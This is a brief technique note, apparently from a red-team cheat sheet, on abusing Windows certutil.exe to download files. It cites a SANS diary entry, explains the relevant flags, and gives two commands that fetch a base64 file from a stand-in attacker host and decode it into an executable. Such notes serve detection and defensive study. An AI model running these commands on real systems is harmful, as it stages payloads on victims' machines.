# Useful links
<https://isc.sans.edu/forums/diary/A+Suspicious+Use+of+certutilexe/23517/>

# Notes
Certutil can be used to download files from web server

- `-urlcache` is used to perform URL cache management action.
- `-f` is used to force fetching the specified URL and updating the cache.
- `-split` is used to dump the file on disk.


# Commands
```powershell
# Download base64 encoded file and decode to .exe
C:\Temp>certutil.exe -urlcache -split -f "https://hackers.home/badcontent.txt" bad.txt
C:\Temp>certutil.exe -decode bad.txt bad.exe
```
